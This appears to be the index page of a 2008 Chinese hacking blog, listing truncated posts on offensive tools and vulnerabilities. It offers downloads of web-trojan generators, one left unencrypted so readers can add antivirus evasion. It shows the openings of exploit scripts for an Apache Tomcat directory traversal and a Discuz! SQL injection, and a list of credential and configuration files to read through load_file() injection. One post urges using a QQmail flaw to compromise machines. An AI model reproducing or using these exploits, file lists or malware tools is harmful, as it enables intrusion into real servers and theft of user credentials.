ShadowHider's Blog

文章列表

网马shellcode转换器

2008-08-20 15:58

近日闲来无事解网马玩，于是乎想到了这个，很仓促的写了个，希望对大家有点用。

连源码一起发布的，大家可以自己修改。直接去暗组下吧，扔在那里了。

http://www.darkst.com/bbs/thread-23665-1-1.html

类别：Some Tools | 评论(0) | 浏览()

Happy birthday to 自己...！

2008-08-14 14:12

16岁了，哎................该来的人没来啊，这顿饭吃着还有什么意思？？

算了........ 开心起来吧小伙..

You ary best !

类别：闲扯 | 评论(5) | 浏览()

Apache Tomcat UTF-8编码漏洞

2008-08-12 17:32

Apache Tomcat出了一个类似当年IIS url 编码的漏洞。
漏洞发生在Apache Tomcat处理UTF-8编码时，没有正确转换，从而导致在处理包含%c0%ae%c0%ae的url时转换为类似../的形式，使得可以遍历系统任意文件，包括/etc/passwd等
触发的条件为Apache Tomcat的配置文件context.xml 或 server.xml 的'allowLinking' 和 'URIencoding' 允许'UTF-8'选项
漏洞测试代码如下：

Dim strUrl,strSite

showB()
Set Args = Wscript.Arguments

If Args.Count <> 1 Then
ShowU()
Else
str

阅读全文>>

类别：0day | 评论(0) | 浏览()

Apache Tomcat Directory Traversal Vulnerability

2008-08-12 12:25

Title: Apache Tomcat Directory Traversal Vulnerability
Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote File Disclosure
Vulnerable Version: prior to 6.0.18
Solution:
 - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)
 - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.
 - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix unt

阅读全文>>

类别：0day | 评论(0) | 浏览()

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

2008-08-07 21:45

哎~~~不多说了，PHP版EXP

<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
+------------------------------------------------------------------+
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
+------------------------------------------------------------------+
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$u

阅读全文>>

类别：0day | 评论(3) | 浏览()

Discuz!论坛wap功能模块编码的注射漏洞

2008-08-05 09:59

Discuz!论坛wap功能模块编码的注射漏洞

发布时间:2008-08-04
SBEUGID:SEBUGV2008083778
影响版本:
Discuz!4.0.0
Discuz!4.1.0
Discuz!5.0.0
Discuz!5.5.0
Discuz!6.0.0
Discuz!6.1.0
描述:
Discuz!论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质量，运行效率，负载能力，安全等级，功能可操控性和权限严密性等方面都在广大用户中有良好的口碑

由于 PHP 对多

阅读全文>>

类别：0day | 评论(3) | 浏览()

QQmail..................

2008-07-31 18:09

今天在DST的工作有点失误，哎~~~

发个关于QQmail的东东，大家自己看吧,该抓鸡就抓吧，神不知那什么也不觉o(∩_∩)o...为什么说它神不知鬼不觉呢？？因为这个貌似

阅读全文>>

类别：网络安全 | 评论(2) | 浏览()

UC网马生成器

2008-07-30 11:45

我老觉得这几天是不是少点什么东西，今天再翻我存歌的文件夹时发现了这个。放了1个多礼拜了，给大家吧。生成出来不加密，方便大家自己去做免杀，影响UC和新浪网络电视。

懒得传了，前几天扔暗组了，大家直接去下吧http://www.darkst.com/bbs/thread-21667-1-1.html

类别：Some Tools | 评论(2) | 浏览()

load_file()查看常用的一些配置文件

2008-07-21 13:01

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
C:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
/etc/sysconfig/iptables //从中得到防火墙规则策略
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Serv

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

基于access的网马

2008-07-20 22:02

好几天没上网了，今天一上就看到了这个。恩，写个生成器吧。

下载地址：http://www.namipan.com/d/64bc82997d24ab1fb9c3865b3462102468b9054843110000

类别：Some Tools | 评论(0) | 浏览()